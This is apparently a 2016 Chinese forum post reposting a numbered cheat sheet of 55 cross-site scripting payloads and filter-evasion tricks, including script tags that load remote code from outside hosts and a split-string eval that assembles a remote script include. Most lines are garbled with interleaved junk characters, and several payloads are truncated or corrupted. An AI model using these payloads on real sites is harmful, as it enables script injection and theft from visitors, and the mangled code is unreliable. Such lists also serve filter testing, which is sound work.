(1)普通的XSS JavaScript注入
( e) |4 c5 s N+ I1 B<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" i5 F! \: v1 m9 P% o) j
(99)另类弹框
2 Z" k( T6 J* h% u0 s( F0 g+ }<q/oncut=alert()>1
C _& e" \$ S0 |9 J! e<s/onclick=alert()>b
8 C1 f9 @6 o/ q- p9 ] <XSS=" onclick="alert(1)//">clickme</SSX=">
: B* ~* H4 g+ `' O- X+ N' N) O <zzz onclick=alert`1`>clickme</zzz> # a4 C6 m3 R9 a+ x
<a onclick=alert`1`>clickme</a>" ?+ K6 @9 N. O4 \( v
<a=">clickme</a=">) \* @) m& U% V4 ]# k5 l; D* O6 B% x: n
<a=">clickme</a># b8 e: q7 X0 S' _
<z=">clickme</z=">& H ?* V3 R* \. X" x
<z onclick=alert`1`>clickme</z>* c. h7 `9 C! ?/ U) P, q3 D }: t
1 Z- t& N2 `9 V" Y
(2)IMG标签XSS使用JavaScript命令
! c: h& Q' x* w5 y7 o* D<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 `- K2 p5 h3 L
+ {' s: {8 J3 x/ t$ X7 ^* s(3)IMG标签无分号无引号, H/ K! ~" O6 K) V* @* g! H
<IMG SRC=javascript:alert(‘XSS’)>
) Q: I* G' q: c( n6 A
8 \1 v2 O. E1 T8 X" I7 ^) C% M, y; X(4)IMG标签大小写不敏感) e- }" a: l3 d6 c
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; e: {; [8 x* @8 I! J: k% n0 V; m6 q' Y) D
(5)HTML编码(必须有分号)$ W% V( ]! T7 Y" Y) ?( G1 V
<IMG SRC=javascript:alert(“XSS”)>" R8 _4 k' P( ]) ]2 b0 E4 U2 f
0 `) ]; U0 X' h4 r(6)修正缺陷IMG标签' f: v$ g* W% F5 l' V) N! g
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 h: T; V" e z. ]! v
- T6 n( @" |& a a9 K E! j* s(7)formCharCode标签(计算器)
1 s- i; |. u8 ]% `, n0 a: ^, {<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 ~; e8 q2 ~( w
: L6 s. j4 r; l. ~; j4 ]* C(8)UTF-8的Unicode编码(计算器)4 s' L9 Q6 ^3 Y$ Y& M" p7 g
<IMG SRC=jav..省略..S')>: p8 \! c- @# Y0 Z7 N1 G# q4 ]/ z
6 \, `4 ~& I9 T$ k0 v( }# I: |2 y8 q3 t(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) Q2 a" Q- o! M* T8 C9 f" g! i<IMG SRC=jav..省略..S')>
, ^; E$ P- G; o9 z4 @
/ {9 O4 Z; z; S5 c& \(10)十六进制编码也是没有分号(计算器)/ k# C% D# D* `8 T
<IMG SRC=\'#\'" /span> x3 |, e& F2 h9 q$ x
; [5 p/ C# T7 M9 C& i4 V(11)嵌入式标签,将Javascript分开
9 f8 U6 }: Q) S. V8 M<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 P. r; z* t4 x6 Q. l
+ U6 E- y& \/ `& \' p
(12)嵌入式编码标签,将Javascript分开
$ Z1 M) C( I3 Y- h* Y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 a: F* p4 D$ M8 H: D) h1 f$ E L) U
; ]6 {4 |7 u1 v% V
(13)嵌入式换行符6 |) R4 c- ^" c/ }6 U) {# I
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>" R" c# |4 v6 \0 ^( R+ `, N$ A
' _8 \$ Z) G9 j(14)嵌入式回车0 T7 A1 n: `% O; }7 A
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 ^" B* _7 A' U4 ?8 K4 a, M9 F
" r8 |* @0 | X# r- J$ P7 w
(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 s; F( w J U% w8 W+ I- ]! y' T
<IMG SRC=\'#\'" /span>6 u7 x* o* V- \ V, L( b
" n# n5 t" ?* L* z6 V+ H(16)解决限制字符(要求同页面)
" Z/ i4 C# u0 n9 c6 M$ b9 P<script>z=’document.’</script>
$ d. P$ F2 A" p: C<script>z=z+’write(“‘</script>; D$ \- \/ f, |
<script>z=z+’<script’</script>. {2 s, O+ j" v8 ?
<script>z=z+’ src=ht’</script>0 j9 u+ [% S$ A2 X
<script>z=z+’tp://ww’</script>
: Z$ T8 t9 \/ O1 P9 b* c" ?, g<script>z=z+’w.shell’</script>( M/ F) _0 O& Y) F! A) m! e' C J3 l
<script>z=z+’.net/1.’</script>! j" ?. R+ o+ h* ^
<script>z=z+’js></sc’</script>4 Y+ @& S- z2 e2 N3 F) F( B
<script>z=z+’ript>”)’</script>( f. q; u1 Q9 z+ X% o5 A) ^
<script>eval_r(z)</script>3 d9 N. t) x/ m. J
( x# Y5 W. K% G
(17)空字符
* k( @: v% g- M$ p, T1 nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. L8 S) s: K' x# H" R( [
$ o6 V, J( F$ b) ~* }(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; O5 a& ]# p- [/ r8 C4 F( P) e( ^
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ O) n9 H3 {% `. ?
" Z. P* I- M B, E/ X(19)Spaces和meta前的IMG标签% f0 Z! I {2 A; r+ L( N* \) C( I
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
! a" W7 o- W# j* r+ }0 }) O6 N" X' e5 U( V
(20)Non-alpha-non-digit XSS4 r3 U9 H* r, ~2 J0 H# ?
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
7 z. o) o/ \0 c; t7 u
# O& H( h5 K9 u$ [; D5 z6 f(21)Non-alpha-non-digit XSS to 2
$ S3 L4 T) A9 g& _/ F+ M9 s<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>' ?# O+ f% j9 L* g7 j8 N6 n/ L, \
1 U3 Q4 o# p4 q3 W1 v(22)Non-alpha-non-digit XSS to 3
3 S( p1 v' b/ q+ p1 `# F' t0 j<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>, y, R0 v. G8 @- _
# v; F/ F" B( K. R4 C(23)双开括号
5 g, m' i: I2 V# v<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ [& U% y+ C5 s' ?! ]
9 J4 v' |5 O8 r9 j9 h% W( E& ?. K(24)无结束脚本标记(仅火狐等浏览器)
, f& J {2 [) v$ i L6 Q v; I1 p5 d<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* d$ Y: D4 p. z9 H! r
; p$ U+ Y: f! C! J
(25)无结束脚本标记2
9 D: Y' r. X6 n$ J% a7 n<SCRIPT SRC=//3w.org/XSS/xss.js>6 z. y# u4 r/ t. ]2 v
1 s5 u! P0 x; G* s
(26)半开的HTML/JavaScript XSS
3 i& x9 f1 \2 k( a4 }; {0 G1 N8 W<IMG SRC=\'#\'" /span>
7 w) H1 h- P, A7 @1 m
( v3 X' i6 h ~' c2 n% o( S% h(27)双开角括号6 p3 t8 H3 ^% w' U$ S+ v/ j
<iframe src=http://3w.org/XSS.html <
0 }4 P0 i1 |3 J+ F: \7 O
; Q% B4 z- j& n(28)无单引号 双引号 分号
4 L$ ^5 m6 T" H2 K( A" r: s: o( u<SCRIPT>a=/XSS/! O u. B9 W* ^! w
alert(a.source)</SCRIPT>
9 A9 B( J8 X: Y9 R3 ]; }$ t. h5 M) D- U9 {3 x* p
(29)换码过滤的JavaScript
& S1 S! z) o" r# E\”;alert(‘XSS’);//
" S0 }8 ^7 N5 w% Z
- b8 ~9 S& |$ q(30)结束Title标签% T+ O- S1 N( S! t# n0 X( C
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% \ D6 o8 Z% S0 H
' I. F, v$ N2 B/ `(31)Input Image j9 M1 k* A' W, A8 y2 n: M: s
<INPUT SRC=\'#\'" /span>
- r, R8 G ]& @6 j* y2 s: {! H% U9 R
(32)BODY Image8 V7 m3 ]3 @) X- A
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( Y+ j, W) Z; j& C d! W6 Y* a5 ^
# s5 r1 `9 P# _8 k. n9 \8 H" k(33)BODY标签" P+ R3 p+ b3 L2 u' Q
<BODY(‘XSS’)>5 g5 ~# m! O% Q6 w% F7 S
9 c0 a3 O/ [7 F# a! K, p(34)IMG Dynsrc) L/ }' F5 p# o3 s1 v, H% @& h" {
<IMG DYNSRC=\'#\'" /span>2 [( u8 a# r9 w8 v
" S: E* d" R. T/ o9 M- c- a(35)IMG Lowsrc
1 W5 g' N N! N% H( T<IMG LOWSRC=\'#\'" /span>
' }$ ?% f! V7 r, Q( {9 W8 R( E' V* c- h8 a
(36)BGSOUND( N9 z# M, o9 O4 k
<BGSOUND SRC=\'#\'" /span>
9 i d# @& S- l' j, n# R4 h$ f& \- V; o
(37)STYLE sheet2 \* `( y7 _4 X1 A$ k7 \
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 p! D# b& [8 ?$ \ `- Y7 V. J6 ?; u# d9 N# h6 o
(38)远程样式表
" D7 N# a9 n7 b% z _<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
2 |7 f8 ~# h# |$ Z: }" |
- ]3 F" t6 i. v(39)List-style-image(列表式)! s2 a* _8 q" L
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( u( p$ ~% j' R2 W9 b- S4 r% ?" j4 ~- c& H& j2 |9 _
(40)IMG VBscript6 V, R. C! V g9 I
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! {7 B+ Y0 \# R) p3 m Z S$ x
8 v" @: o$ h5 ?(41)META链接url* x; [7 y0 j* R* q3 y& m
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>% C9 ~+ d( M. B/ m; H, C- r
* @, I9 F& u0 `0 [(42)Iframe4 r% f9 W! f6 [$ r M& G( q0 X+ z. j
<IFRAME SRC=\'#\'" /IFRAME>& f; C* \" }3 G2 ?( j
6 D7 _0 o4 g3 h( r(43)Frame5 q0 A6 {4 j: F1 q0 J, O% W$ Z
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>9 v g$ ~4 i5 \. v7 }1 r
! R( H& C7 k# |/ k. d' B: X(44)Table
: @$ r* q" [, a/ T( f- k* e! |<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>( {" K2 q; X5 Z' h
4 g, `% l: O- i& r' U, d8 n% v
(45)TD3 G& @/ q. C9 |# _
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* b! Y) u& T# k' [7 {+ b8 p g1 ^3 k3 i$ t8 q. T! E
(46)DIV background-image7 w9 b( D0 B& L+ l0 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 D' c; N+ D* D0 @- B8 F
6 ~$ |3 M: d( X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
M, J7 f' l+ v6 h& t<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>4 p) V, G3 f; S. v- [; E
2 t4 ~" Z! R |: W# Y
(48)DIV expression
! j$ x) L/ D9 R<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 X) Q/ a2 T8 r, k
8 I( v# n7 O- u
(49)STYLE属性分拆表达
4 }1 Z" T5 I; f- f$ W) C' Y& S4 d& [& o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 i; o8 G8 h9 E
$ W. p: q! u% Y: n! ~9 H(50)匿名STYLE(组成:开角号和一个字母开头) I0 Z! r* y4 m6 s3 D4 y7 l* C
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 T% m# F% d8 X7 i% w. s/ s9 I
1 b2 C" J. q' e* y0 G- o$ x5 u) k
(51)STYLE background-image: A5 E/ b" i7 Y& `, v# z
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& ^) ~ H7 x. ^5 ^# d o+ G, S p8 }) q ~3 L& j
(52)IMG STYLE方式
3 _6 C3 H3 o% gexppression(alert(“XSS”))’>
2 H5 l- q) a' B J b
# `5 S* F7 ?- s7 s5 F(53)STYLE background! N2 h9 R7 _0 d q
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 g* N( H8 ~# x$ `, i2 W1 b d c+ J+ i
(54)BASE
# P) d7 n' Q: e4 q- ^3 ?; V<BASE HREF=”javascript:alert(‘XSS’);//”>
+ p! x$ ?$ X- Z: V' d) G/ C
" y6 u0 o4 y& P- l& {6 H' F1 `(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& Q5 F# o3 h$ [* y; _% T4 X `4 s
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>! Q3 |; ?1 m/ w1 |$ o
|
发表于 2016-4-28 10:06:15
收藏
支持
反对